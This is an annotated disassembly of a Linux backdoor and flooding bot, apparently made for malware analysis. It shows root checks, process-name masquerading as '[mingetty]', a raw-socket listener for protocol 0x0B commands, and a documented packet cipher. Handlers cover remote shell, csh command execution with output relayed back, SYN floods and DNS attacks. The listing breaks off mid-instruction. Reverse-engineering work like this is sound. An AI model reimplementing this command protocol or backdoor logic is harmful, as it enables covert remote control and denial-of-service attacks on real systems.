.text:08048134 MainMonster proc near ; CODE XREF: start+56p .text:08048134 .text:08048134 randval = dword ptr -44F0h .text:08048134 SizeOfAssignDestIP= dword ptr -44ECh .text:08048134 pPayload = dword ptr -44E8h .text:08048134 pNextDest = dword ptr -44E4h .text:08048134 pPayloadBuf = dword ptr -44E0h .text:08048134 FileHandle = dword ptr -44DCh .text:08048134 pRecvContent = dword ptr -44D8h .text:08048134 pRecvProto = dword ptr -44D4h .text:08048134 pRecvBuf = dword ptr -44D0h .text:08048134 socket_id = dword ptr -44CCh .text:08048134 socket_id2_stream= dword ptr -44C8h .text:08048134 SockLen = dword ptr -44C4h .text:08048134 OptionValue = dword ptr -44C0h .text:08048134 DestBuf = byte ptr -44BCh .text:08048134 Buffer[12772] = byte ptr -43BCh .text:08048134 pPeerSockAddr = byte ptr -11D8h .text:08048134 SockAddr = sockaddr_in ptr -11C8h .text:08048134 RelayDest_10 = dword ptr -11B8h .text:08048134 Payload = byte ptr -1190h .text:08048134 PayloadBuf = byte ptr -1000h .text:08048134 RecvBuf = RecvBuf ptr -800h .text:08048134 pProcname = dword ptr 0Ch .text:08048134 arg_185 = dword ptr 18Dh .text:08048134 arg_7E2 = byte ptr 7EAh .text:08048134 arg_7F4 = byte ptr 7FCh .text:08048134 arg_7F5 = byte ptr 7FDh .text:08048134 arg_7F6 = byte ptr 7FEh .text:08048134 arg_7F7 = byte ptr 7FFh .text:08048134 arg_7F8 = byte ptr 800h .text:08048134 arg_FF6 = byte ptr 0FFEh .text:08048134 arg_FF8 = byte ptr 1000h .text:08048134 arg_11C0 = word ptr 11C8h .text:08048134 arg_43B4 = byte ptr 43BCh .text:08048134 arg_44A5 = byte ptr 44ADh .text:08048134 arg_44A6 = byte ptr 44AEh .text:08048134 arg_44A7 = byte ptr 44AFh .text:08048134 arg_44AA = byte ptr 44B2h .text:08048134 arg_44AB = byte ptr 44B3h .text:08048134 arg_44B4 = byte ptr 44BCh .text:08048134 arg_44BC = byte ptr 44C4h .text:08048134 arg_44C8 = dword ptr 44D0h .text:08048134 .text:08048134 push ebp .text:08048135 mov ebp, esp .text:08048137 sub esp, 44F0h ; Integer Subtraction .text:0804813D push edi .text:0804813E push esi .text:0804813F push ebx .text:08048140 mov ebx, [ebp+pProcname] .text:08048143 mov [ebp+OptionValue], 1 .text:0804814D lea edx, [ebp+RecvBuf] ; Load Effective Address .text:08048153 mov [ebp+pRecvBuf], edx .text:08048159 lea ecx, [ebp+RecvBuf.IP_Pkt.proto] ; Load Effective Address .text:0804815F mov [ebp+pRecvProto], ecx .text:08048165 lea edx, [ebp+RecvBuf.IP_Pkt.content] ; Load Effective Address .text:0804816B mov [ebp+pRecvContent], edx .text:08048171 mov [ebp+SockLen], 10h .text:0804817B call geteuid ; Call Procedure .text:0804817B .text:08048180 test eax, eax ; Logical Compare .text:08048182 jz short root_id ; Jump if Zero (ZF=1) .text:08048182 .text:08048184 push -1 .text:08048186 call exit ; Call Procedure .text:08048186 .text:0804818B nop ; No Operation .text:0804818C .text:0804818C root_id: ; CODE XREF: MainMonster+4Ej .text:0804818C mov edx, [ebx] .text:0804818E xor al, al ; Logical Exclusive OR .text:08048190 mov edi, edx .text:08048192 cld ; Clear Direction Flag .text:08048193 mov ecx, 0FFFFFFFFh .text:08048198 repne scasb ; Compare String .text:0804819A mov eax, ecx .text:0804819C not eax ; One's Complement Negation .text:0804819E dec eax ; Decrement by 1 .text:0804819F push eax .text:080481A0 push 0 .text:080481A2 push edx .text:080481A3 call _memset ; Call Procedure .text:080481A3 .text:080481A8 .text:080481A8 Mingetty: .text:080481A8 mov edx, [ebx] .text:080481AA mov eax, dword ptr ds:aMingetty ; "[mingetty]" .text:080481AF mov [edx], eax .text:080481B1 mov eax, dword ptr ds:aMingetty+4 .text:080481B6 mov [edx+4], eax .text:080481B9 mov ax, word ptr ds:aMingetty+8 .text:080481BF mov [edx+8], ax .text:080481C3 mov al, byte ptr ds:aMingetty+0Ah .text:080481C9 mov [edx+0Ah], al .text:080481CC push SIG_IGN ; NewSigHandler .text:080481CE push SIGCHLD ; SigNum .text:080481D0 call signal ; CALL HANDLERS WERE SET TO SIG_IGN (0x1) .text:080481D0 ; SO PROGRAM PROTECTING ITSELF from some calls. .text:080481D0 .text:080481D5 call fork ; Call Procedure .text:080481D5 .text:080481DA add esp, 14h ; Add .text:080481DD test eax, eax ; Logical Compare .text:080481DF jz short _Child ; Jump if Zero (ZF=1) .text:080481DF .text:080481E1 push 0 .text:080481E3 call exit ; Call Procedure .text:080481E3 .text:080481E8 .text:080481E8 _Child: ; CODE XREF: MainMonster+ABj .text:080481E8 call setsid ; Call Procedure .text:080481E8 .text:080481ED push SIG_IGN ; NewSigHandler .text:080481EF push SIGCHLD ; SigNum .text:080481F1 call signal ; CALL HANDLERS WERE SET TO SIG_IGN (0x1) .text:080481F1 ; SO PROGRAM PROTECTING ITSELF from some calls. .text:080481F1 .text:080481F6 call fork ; Call Procedure .text:080481F6 .text:080481FB add esp, 8 ; Add .text:080481FE test eax, eax ; Logical Compare .text:08048200 jz short _Child2 ; Jump if Zero (ZF=1) .text:08048200 .text:08048202 push 0 .text:08048204 call exit ; Call Procedure .text:08048204 .text:08048209 lea esi, [esi+0] ; Load Effective Address .text:0804820C .text:0804820C _Child2: ; CODE XREF: MainMonster+CCj .text:0804820C push offset aRoot .text:08048211 call chdir ; Call Procedure .text:08048211 .text:08048216 push 0 .text:08048218 call close ; Call Procedure .text:08048218 .text:0804821D push 1 .text:0804821F call close ; Call Procedure .text:0804821F .text:08048224 push 2 .text:08048226 call close ; Call Procedure .text:08048226 .text:0804822B mov ds:gProc_ID, 0 .text:08048235 mov ds:gPid, 0 .text:0804823F mov ds:gSwitch_Num, 0 .text:08048249 push 0 .text:0804824B call time ; Call Procedure .text:0804824B .text:08048250 add esp, 14h ; Add .text:08048253 push eax .text:08048254 call ___srandom ; Call Procedure .text:08048254 .text:08048259 .text:08048259 Raw_Sock: ; Add .text:08048259 add esp, 4 .text:0804825C push 0Bh ; protocol .text:0804825E push SOCK_RAW ; type .text:08048260 push AF_INET ; af .text:08048262 call socket ; Call Procedure .text:08048262 .text:08048267 mov [ebp+socket_id2_stream], eax .text:0804826D push SIG_IGN ; NewSigHandler .text:0804826F push SIGHUP ; SigNum .text:08048271 call signal ; CALL HANDLERS WERE SET TO SIG_IGN (0x1) .text:08048271 ; SO PROGRAM PROTECTING ITSELF from some calls. .text:08048271 .text:08048276 push SIG_IGN ; SIG_IGN .text:08048278 push SIGTERM ; SIGTERM .text:0804827A call signal ; CALL HANDLERS WERE SET TO SIG_IGN (0x1) .text:0804827A ; SO PROGRAM PROTECTING ITSELF from some calls. .text:0804827A .text:0804827F push SIG_IGN ; NewSigHandler .text:08048281 push SIGCHLD ; SIGUSR2 .text:08048281 ; SIGCHLD .text:08048283 call signal ; CALL HANDLERS WERE SET TO SIG_IGN (0x1) .text:08048283 ; SO PROGRAM PROTECTING ITSELF from some calls. .text:08048283 .text:08048288 add esp, 24h ; Add .text:0804828B push SIG_IGN ; NewSigHandler .text:0804828D push SIGCHLD ; SigNum .text:0804828F call signal ; CALL HANDLERS WERE SET TO SIG_IGN (0x1) .text:0804828F ; SO PROGRAM PROTECTING ITSELF from some calls. .text:0804828F .text:08048294 add esp, 8 ; Add .text:08048297 lea ecx, [ebp+PayloadBuf] ; Load Effective Address .text:0804829D mov [ebp+pPayloadBuf], ecx .text:080482A3 lea edx, [ebp+RelayDest_10] ; Load Effective Address .text:080482A9 mov [ebp+pNextDest], edx .text:080482AF nop ; No Operation .text:080482B0 .text:080482B0 ListenForPacketB: ; CODE XREF: MainMonster+D91j .text:080482B0 push 0 ; flags .text:080482B2 push 800h ; len .text:080482B7 lea eax, [ebp+RecvBuf] ; Load Effective Address .text:080482BD push eax ; buf .text:080482BE mov ecx, [ebp+socket_id2_stream] .text:080482C4 push ecx ; s .text:080482C5 call recv ; Call Procedure .text:080482C5 .text:080482CA mov esi, eax .text:080482CC add esp, 10h ; Add .text:080482CF mov edx, [ebp+pRecvBuf] .text:080482D5 cmp [edx+ip.protocol], 0Bh ; IP PROTOCOL = 0x0B for attacker's packet .text:080482D9 jnz Exit_Switch_Loop_Listen ; default .text:080482D9 .text:080482DF mov ecx, [ebp+pRecvProto] .text:080482E5 cmp byte ptr [ecx], 2 ; AttackPayload_0 = 2 .text:080482E8 jnz Exit_Switch_Loop_Listen ; default .text:080482E8 .text:080482EE cmp esi, 0C8h ; PacketSize > 0xC8 (200 bytes) .text:080482F4 jle Exit_Switch_Loop_Listen ; default .text:080482F4 .text:080482FA mov edx, [ebp+pPayloadBuf] ; PlainText .text:08048300 push edx .text:08048301 mov ecx, [ebp+pRecvContent] ; Cipher .text:08048307 push ecx .text:08048308 lea eax, [esi-16h] ; Length .text:0804830B push eax .text:0804830C call Decoder ; Decoder: (byte-level) .text:0804830C ; Pn = Cn - Cn-1 - 0x17, for n > 0 .text:0804830C ; Po = Co - 0x17 .text:0804830C ; .text:0804830C ; => Corresponding Encoder: .text:0804830C ; => Co = Po + 0x17 .text:0804830C ; => Cn = Pn + Cn-1 + 0x17, for n > 0 .text:0804830C .text:08048311 add esp, 0Ch ; Add .text:08048314 movzx eax, [ebp+PayloadBuf+1] ; Move with Zero-Extend .text:0804831B dec eax ; Decrement by 1 .text:0804831C cmp eax, 0Bh ; switch 12 cases .text:0804831F ja Exit_Switch_Loop_Listen ; default .text:0804831F .text:08048325 jmp dword ptr ds:Switch_RecvPacket[eax*4] ; switch jump .text:08048325 .text:08048325 ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ .text:0804832C Switch_RecvPacket: ; DATA XREF: MainMonster+1F1r .text:0804832C dd offset Sw0_Relaying ; jump table for switch statement .text:0804832C dd offset Sw1_Set_Relay_IP .text:0804832C dd offset Sw2_Send_Cmd_Results .text:0804832C dd offset Sw3_Query_Root?3 .text:0804832C dd offset Sw4_TransmitUDP_A .text:0804832C dd offset Sw5_Remote_Shell .text:0804832C dd offset Sw6_Exec_Command .text:0804832C dd offset Sw7_Kill_Parent_Process .text:0804832C dd offset Sw8_Query_Root?8 .text:0804832C dd offset Sw9_Send_SYN .text:0804832C dd offset SwA_Send_SYN__ .text:0804832C dd offset SwB_DNS_Attack .text:0804835C ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ .text:0804835C .text:0804835C Sw0_Relaying: ; CODE XREF: MainMonster+1F1j .text:0804835C ; DATA XREF: MainMonster+1F8o .text:0804835C mov al, ds:gState1 ; case 0x0 .text:08048362 mov byte ptr [ebp+RecvBuf], al .text:08048368 mov eax, ds:gState2 .text:0804836D mov byte ptr [ebp+RecvBuf], al .text:08048373 mov byte ptr [ebp+RecvBuf+1], 1 .text:0804837A mov byte ptr [ebp+RecvBuf+2], 7 .text:08048381 cmp ds:gProc_ID, 0 ; Compare Two Operands .text:08048388 jz short child ; Jump if Zero (ZF=1) .text:08048388 .text:0804838A mov byte ptr [ebp+RecvBuf+3], 1 .text:08048391 mov eax, ds:gSwitch_Num .text:08048396 mov byte ptr [ebp+RecvBuf+4], al .text:0804839C jmp short loc_80483A7 ; Jump .text:0804839C .text:0804839C ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ .text:0804839E align 4 .text:080483A0 .text:080483A0 child: ; CODE XREF: MainMonster+254j .text:080483A0 mov byte ptr [ebp+RecvBuf+3], 0 .text:080483A7 .text:080483A7 loc_80483A7: ; CODE XREF: MainMonster+268j .text:080483A7 mov edx, [ebp+pPayloadBuf] .text:080483AD push edx ; OUT Cipher .text:080483AE lea eax, [ebp+RecvBuf] ; Load Effective Address .text:080483B4 push eax ; IN PlainText .text:080483B5 push 190h ; Length .text:080483BA call Encoder ; Encoder: (byte level) .text:080483BA ; Co = Po + 0x17 .text:080483BA ; Cn = Pn + Cn-1 + 0x17, for n > 0 .text:080483BA ; .text:080483BA ; => Decoder: (byte-level) .text:080483BA ; => Pn = Cn - Cn-1 - 0x17, for n > 0 .text:080483BA ; => Po = Co - 0x17 .text:080483BA ; .text:080483BA .text:080483BF call _random ; Call Procedure .text:080483BF .text:080483C4 mov ecx, 0C9h .text:080483C9 cdq ; Convert Doubleword to Quadword .text:080483CA idiv ecx ; Signed Divide .text:080483CC mov ebx, edx .text:080483CE lea eax, [ebx+190h] ; Load Effective Address .text:080483D4 push eax .text:080483D5 mov edx, [ebp+pPayloadBuf] .text:080483DB push edx .text:080483DC mov ecx, [ebp+pNextDest] .text:080483E2 push ecx .text:080483E3 call Relay ; Call Procedure .text:080483E3 .text:080483E8 add esp, 18h ; Add .text:080483EB jmp Exit_Switch_Loop_Listen ; default .text:080483EB .text:080483F0 ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ .text:080483F0 .text:080483F0 Sw1_Set_Relay_IP: ; CODE XREF: MainMonster+1F1j .text:080483F0 ; DATA XREF: MainMonster+1F8o .text:080483F0 movzx edx, [ebp+PayloadBuf+2] ; case 0x1 .text:080483F7 mov ds:gCtrl_Parameter, edx .text:080483FD mov al, byte ptr [ebp+RecvBuf.IP_Pkt.ip.dst.S_un.S_addr] .text:08048403 mov byte ptr ds:gHost_IP, al .text:08048409 mov al, byte ptr [ebp+RecvBuf.IP_Pkt.ip.dst.S_un.S_addr+1] .text:0804840F mov byte ptr ds:gHost_IP+1, al .text:08048415 mov al, byte ptr [ebp+RecvBuf.IP_Pkt.ip.dst.S_un.S_addr+2] .text:0804841B mov byte ptr ds:gHost_IP+2, al .text:08048421 mov al, byte ptr [ebp+RecvBuf.IP_Pkt.ip.dst.S_un.S_addr+3] .text:08048427 mov byte ptr ds:gHost_IP+3, al .text:0804842D push 0 .text:0804842F call time ; Call Procedure .text:0804842F .text:08048434 add esp, 4 ; Add .text:08048437 push eax .text:08048438 call ___srandom ; Call Procedure .text:08048438 .text:0804843D add esp, 4 ; Add .text:08048440 call _random ; Call Procedure .text:08048440 .text:08048445 mov ecx, 0Ah .text:0804844A cdq ; Convert Doubleword to Quadword .text:0804844B idiv ecx ; Signed Divide .text:0804844D mov edi, edx .text:0804844F xor ebx, ebx ; Logical Exclusive OR .text:08048451 xor esi, esi ; Logical Exclusive OR .text:08048453 nop ; No Operation .text:08048454 .text:08048454 loop_set_relay_IP: ; CODE XREF: MainMonster+3FEj .text:08048454 cmp ebx, edi ; Compare Two Operands .text:08048456 jz loc_804852B ; Jump if Zero (ZF=1) .text:08048456 .text:0804845C cmp ds:gCtrl_Parameter, 2 ; Compare Two Operands .text:08048463 jnz short Bypass_Assign_IP ; Jump if Not Zero (ZF=0) .text:08048463 .text:08048465 .text:08048465 Assign_Relay_IP: .text:08048465 mov al, [ebp+ebx*4+PayloadBuf+3] .text:0804846C mov edx, [ebp+pNextDest] .text:08048472 mov [edx+esi], al .text:08048475 mov al, [ebp+ebx*4+PayloadBuf+4] .text:0804847C mov [esi+edx+1], al .text:08048480 mov al, [ebp+ebx*4+PayloadBuf+5] .text:08048487 mov [esi+edx+2], al .text:0804848B mov al, [ebp+ebx*4+PayloadBuf+6] .text:08048492 jmp bit3 ; Jump .text:08048492 .text:08048492 ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ .text:08048497 align 4 .text:08048498 .text:08048498 Bypass_Assign_IP: ; CODE XREF: MainMonster+32Fj .text:08048498 call _random ; Call Procedure .text:08048498 .text:0804849D mov [ebp+randval], eax .text:080484A3 test eax, eax ; Logical Compare .text:080484A5 jge short Bit_0 ; Jump if Greater or Equal (SF=OF) .text:080484A5 .text:080484A7 lea ecx, [eax+0FFh] ; Load Effective Address .text:080484AD mov [ebp+randval], ecx .text:080484B3 .text:080484B3 Bit_0: ; CODE XREF: MainMonster+371j .text:080484B3 mov edx, [ebp+pNextDest] .text:080484B9 mov [esi+edx], al .text:080484BC call _random ; Call Procedure .text:080484BC .text:080484C1 mov [ebp+randval], eax .text:080484C7 test eax, eax ; Logical Compare .text:080484C9 jge short Bit_1 ; Jump if Greater or Equal (SF=OF) .text:080484C9 .text:080484CB lea ecx, [eax+0FFh] ; Load Effective Address .text:080484D1 mov [ebp+randval], ecx .text:080484D7 .text:080484D7 Bit_1: ; CODE XREF: MainMonster+395j .text:080484D7 mov edx, [ebp+pNextDest] .text:080484DD mov [esi+edx+1], al .text:080484E1 call _random ; Call Procedure .text:080484E1 .text:080484E6 mov [ebp+randval], eax .text:080484EC test eax, eax ; Logical Compare .text:080484EE jge short Bit_2 ; Jump if Greater or Equal (SF=OF) .text:080484EE .text:080484F0 lea ecx, [eax+0FFh] ; Load Effective Address .text:080484F6 mov [ebp+randval], ecx .text:080484FC .text:080484FC Bit_2: ; CODE XREF: MainMonster+3BAj .text:080484FC mov edx, [ebp+pNextDest] .text:08048502 mov [esi+edx+2], al .text:08048506 call _random ; Call Procedure .text:08048506 .text:0804850B mov [ebp+randval], eax .text:08048511 test eax, eax ; Logical Compare .text:08048513 jge short Bit_3 ; Jump if Greater or Equal (SF=OF) .text:08048513 .text:08048515 lea ecx, [eax+0FFh] ; Load Effective Address .text:0804851B mov [ebp+randval], ecx .text:08048521 .text:08048521 Bit_3: ; CODE XREF: MainMonster+3DFj .text:08048521 mov edx, [ebp+pNextDest] .text:08048527 .text:08048527 bit3: ; CODE XREF: MainMonster+35Ej .text:08048527 mov [esi+edx+3], al .text:0804852B .text:0804852B loc_804852B: ; CODE XREF: MainMonster+322j .text:0804852B add esi, 4 ; Add .text:0804852E inc ebx ; Increment by 1 .text:0804852F cmp ebx, 9 ; Compare Two Operands .text:08048532 jle loop_set_relay_IP ; Jump if Less or Equal (ZF=1 | SF!=OF) .text:08048532 .text:08048538 mov eax, ds:gCtrl_Parameter .text:0804853D test eax, eax ; Logical Compare .text:0804853F jnz short loc_8048543 ; Jump if Not Zero (ZF=0) .text:0804853F .text:08048541 xor edi, edi ; Logical Exclusive OR .text:08048543 .text:08048543 loc_8048543: ; CODE XREF: MainMonster+40Bj .text:08048543 cmp eax, 2 ; Compare Two Operands .text:08048546 jz Exit_Switch_Loop_Listen ; default .text:08048546 .text:0804854C shl edi, 2 ; Shift Logical Left .text:0804854F mov [ebp+SizeOfAssignDestIP], edi .text:08048555 mov al, [ebp+PayloadBuf+3] .text:0804855B mov ecx, [ebp+pNextDest] .text:08048561 mov [edi+ecx], al .text:08048564 mov al, [ebp+PayloadBuf+4] .text:0804856A mov edx, [ebp+SizeOfAssignDestIP] .text:08048570 mov [edx+ecx+1], al .text:08048574 mov al, [ebp+PayloadBuf+5] .text:0804857A mov [edx+ecx+2], al .text:0804857E mov al, [ebp+PayloadBuf+6] .text:08048584 mov [edx+ecx+3], al .text:08048588 jmp Exit_Switch_Loop_Listen ; default .text:08048588 .text:08048588 ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ .text:0804858D align 4 .text:08048590 .text:08048590 Sw2_Send_Cmd_Results: ; CODE XREF: MainMonster+1F1j .text:08048590 ; DATA XREF: MainMonster+1F8o .text:08048590 call fork ; Store in tmp file .text:08048590 ; fread and retransmit later .text:08048590 ; case 0x2 .text:08048590 .text:08048595 mov ds:gPid, eax .text:0804859A test eax, eax ; Logical Compare .text:0804859C jnz Exit_Switch_Loop_Listen ; Child1_Switch_2 .text:0804859C .text:080485A2 .text:080485A2 TmpChild_Switch_2: ; Call Procedure .text:080485A2 call setsid .text:080485A2 .text:080485A7 push SIG_IGN ; NewSigHandler .text:080485A9 push SIGCHLD ; SigNum .text:080485AB call signal ; CALL HANDLERS WERE SET TO SIG_IGN (0x1) .text:080485AB ; SO PROGRAM PROTECTING ITSELF from some calls. .text:080485AB .text:080485B0 call fork ; Call Procedure .text:080485B0 .text:080485B5 add esp, 8 ; Add .text:080485B8 test eax, eax ; Logical Compare .text:080485BA jz short child_2 ; Jump if Zero (ZF=1) .text:080485BA .text:080485BC .text:080485BC Kill_TmpChild: .text:080485BC push 0Ah .text:080485BE call sleep ; Call Procedure .text:080485BE .text:080485C3 jmp short Kill_TmpChild ; Jump .text:080485C5 .text:080485C5 child_2: .text:080485C5 push 0Ah .text:080485C7 call sleep ; Call Procedure .text:080485C7 .text:080485CC nop ; No Operation .text:080485CD nop ; No Operation .text:080485CE nop ; No Operation .text:080485CF nop ; No Operation .text:080485D0 nop ; No Operation .text:080485D1 nop ; No Operation .text:080485D2 nop ; No Operation .text:080485D3 nop ; No Operation .text:080485D4 nop ; No Operation .text:080485D5 nop ; No Operation .text:080485D6 nop ; No Operation .text:080485D7 nop ; No Operation .text:080485D8 .text:080485D8 Child2_Switch_2: ; CODE XREF: MainMonster+486j .text:080485D8 xor ebx, ebx ; Logical Exclusive OR .text:080485DA lea esi, [esi] ; Load Effective Address .text:080485DC .text:080485DC SHL_2_PayloadBuf: ; CODE XREF: MainMonster+4BDj .text:080485DC mov al, [ebx+ebp+PayloadBuf+2] ; Copy BufCmdLine+2 -> BufCmdLine .text:080485E3 mov [ebx+ebp+PayloadBuf], al .text:080485EA inc ebx ; Increment by 1 .text:080485EB cmp ebx, 18Dh ; Compare Two Operands .text:080485F1 jle short SHL_2_PayloadBuf ; Copy BufCmdLine+2 -> BufCmdLine .text:080485F1 .text:080485F3 push offset aTmp_hj237349 ; "/tmp/.hj237349" .text:080485F8 mov ecx, [ebp+pPayloadBuf] .text:080485FE push ecx .text:080485FF push offset aBinCshFCS1S21 ; "/bin/csh -f -c \"%s\" 1> %s 2>&1" .text:08048604 lea ebx, [ebp+RecvBuf] ; Load Effective Address .text:0804860A push ebx .text:0804860B call sprintf ; Call Procedure .text:0804860B .text:08048610 push ebx ; char * .text:08048611 call system ; Call Procedure .text:08048611 .text:08048616 push offset aRb ; ReadWriteAttribute .text:0804861B push offset aTmp_hj237349 ; FileName .text:08048620 call fopen ; Call Procedure .text:08048620 .text:08048625 mov [ebp+FileHandle], eax .text:0804862B add esp, 1Ch ; Add .text:0804862E test eax, eax ; Logical Compare .text:08048630 jz fopen_FAIL ; Jump if Zero (ZF=1) .text:08048630 .text:08048636 xor edi, edi ; Logical Exclusive OR .text:08048638 lea edx, [ebp+Payload] ; Load Effective Address .text:0804863E mov [ebp+pPayload], edx .text:08048644 .text:08048644 ReadOutput: ; CODE XREF: MainMonster+5BFj .text:08048644 mov ecx, [ebp+FileHandle] .text:0804864A push ecx ; FILE .text:0804864B push 18Eh ; nmemb .text:08048650 push 1 ; size .text:08048652 lea eax, [ebp+RecvBuf] ; Load Effective Address .text:08048658 push eax ; ptr .text:08048659 call fread ; Call Procedure .text:08048659 .text:0804865E mov esi, eax .text:08048660 mov byte ptr [esi+ebp+RecvBuf], 0 .text:08048668 xor ebx, ebx ; Logical Exclusive OR .text:0804866A add esp, 10h ; Add .text:0804866D lea esi, [esi+0] ; Load Effective Address .text:08048670 .text:08048670 SHL2_RecvBuf: ; CODE XREF: MainMonster+551j .text:08048670 mov al, [ebx+ebp+RecvBuf] .text:08048677 mov [ebx+ebp+PayloadBuf+2], al .text:0804867E inc ebx ; Increment by 1 .text:0804867F cmp ebx, 18Dh ; Compare Two Operands .text:08048685 jle short SHL2_RecvBuf ; Jump if Less or Equal (ZF=1 | SF!=OF) .text:08048685 .text:08048687 test edi, edi ; Logical Compare .text:08048689 jnz short SET_PayCmd_4 ; Set Switch Parameter of outgoing packet .text:08048689 .text:0804868B .text:0804868B SET_PayCmd_3: ; Set Switch Parameter of outgoing packet .text:0804868B mov [ebp+PayloadBuf+1], 3 .text:08048692 mov edi, 1 .text:08048697 jmp short To_Encoder ; Jump .text:08048697 .text:08048697 ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ .text:08048699 align 4 .text:0804869C .text:0804869C SET_PayCmd_4: ; CODE XREF: MainMonster+555j .text:0804869C mov [ebp+PayloadBuf+1], 4 ; Set Switch Parameter of outgoing packet .text:080486A3 .text:080486A3 To_Encoder: ; CODE XREF: MainMonster+563j .text:080486A3 mov edx, [ebp+pPayload] .text:080486A9 push edx ; OUT Cipher .text:080486AA mov ecx, [ebp+pPayloadBuf] .text:080486B0 push ecx ; IN PlainText .text:080486B1 push 190h ; Length .text:080486B6 call Encoder ; Encoder: (byte level) .text:080486B6 ; Co = Po + 0x17 .text:080486B6 ; Cn = Pn + Cn-1 + 0x17, for n > 0 .text:080486B6 ; .text:080486B6 ; => Decoder: (byte-level) .text:080486B6 ; => Pn = Cn - Cn-1 - 0x17, for n > 0 .text:080486B6 ; => Po = Co - 0x17 .text:080486B6 ; .text:080486B6 .text:080486BB call _random ; Call Procedure .text:080486BB .text:080486C0 mov ecx, 0C9h .text:080486C5 cdq ; Convert Doubleword to Quadword .text:080486C6 idiv ecx ; Signed Divide .text:080486C8 mov ebx, edx .text:080486CA lea eax, [ebx+190h] ; Load Effective Address .text:080486D0 push eax .text:080486D1 mov edx, [ebp+pPayload] .text:080486D7 push edx .text:080486D8 mov ecx, [ebp+pNextDest] .text:080486DE push ecx .text:080486DF call Relay ; Call Procedure .text:080486DF .text:080486E4 push 61A80h ; timeout_spec .text:080486E9 call _usleep ; Call Procedure .text:080486E9 .text:080486EE add esp, 1Ch ; Add .text:080486F1 test esi, esi ; Logical Compare .text:080486F3 jnz ReadOutput ; Jump if Not Zero (ZF=0) .text:080486F3 .text:080486F9 mov edx, [ebp+FileHandle] .text:080486FF push edx .text:08048700 call fclose ; Call Procedure .text:08048700 .text:08048705 .text:08048705 Delete_tmp: ; "/tmp/.hj237349" .text:08048705 push offset aTmp_hj237349 .text:0804870A call unlink ; Call Procedure .text:0804870A .text:0804870F add esp, 8 ; Add .text:08048712 .text:08048712 fopen_FAIL: ; CODE XREF: MainMonster+4FCj .text:08048712 push 0 ; int .text:08048714 call sys_exit ; Call Procedure .text:08048714 .text:08048719 lea esi, [esi+0] ; Load Effective Address .text:0804871C .text:0804871C Sw3_Query_Root?3: ; CODE XREF: MainMonster+1F1j .text:0804871C ; DATA XREF: MainMonster+1F8o .text:0804871C cmp ds:gProc_ID, 0 ; case 0x3 .text:08048723 jnz Exit_Switch_Loop_Listen ; default .text:08048723 .text:08048729 mov ds:gSwitch_Num, 4 .text:08048733 call fork ; Call Procedure .text:08048733 .text:08048738 mov ds:gProc_ID, eax .text:0804873D test eax, eax ; Logical Compare .text:0804873F jnz Exit_Switch_Loop_Listen ; Parent goes back to listening state .text:0804873F .text:08048745 .text:08048745 Child_3: ; Load Effective Address .text:08048745 lea edi, [ebp+DestBuf] .text:0804874B lea esi, [ebp+PayloadBuf] ; Load Effective Address .text:08048751 cld ; Clear Direction Flag .text:08048752 mov ecx, 63 ; 63*4 = 252 bytes .text:08048757 repe movsd ; Move Byte(s) from String to String .text:08048759 movsw ; Move Byte(s) from String to String .text:0804875B movsb ; Move Byte(s) from String to String .text:0804875C xor ebx, ebx ; Logical Exclusive OR .text:0804875E lea esi, [esi] ; Load Effective Address .text:08048760 .text:08048760 Shift_Left_Payload_9: ; CODE XREF: MainMonster+641j .text:08048760 mov al, [ebx+ebp+DestBuf+9] .text:08048767 mov [ebx+ebp+DestBuf], al .text:0804876E inc ebx ; Increment by 1 .text:0804876F cmp ebx, 254 ; Compare Two Operands .text:08048775 jle short Shift_Left_Payload_9 ; Jump if Less or Equal (ZF=1 | SF!=OF) .text:08048775 .text:08048777 lea eax, [ebp+DestBuf] ; Load Effective Address .text:0804877D push eax .text:0804877E movzx eax, [ebp+PayloadBuf+8] ; Move with Zero-Extend .text:08048785 push eax .text:08048786 movzx eax, [ebp+PayloadBuf+7] ; Move with Zero-Extend .text:0804878D push eax .text:0804878E movzx eax, [ebp+PayloadBuf+6] ; Move with Zero-Extend .text:08048795 push eax .text:08048796 push 0 .text:08048798 movzx eax, [ebp+PayloadBuf+5] ; Move with Zero-Extend .text:0804879F push eax .text:080487A0 movzx eax, [ebp+PayloadBuf+4] ; Move with Zero-Extend .text:080487A7 push eax .text:080487A8 movzx eax, [ebp+PayloadBuf+3] ; Move with Zero-Extend .text:080487AF push eax .text:080487B0 movzx eax, [ebp+PayloadBuf+2] ; Move with Zero-Extend .text:080487B7 push eax .text:080487B8 call DNS_Query_Attack ; Call Procedure .text:080487B8 .text:080487BD add esp, 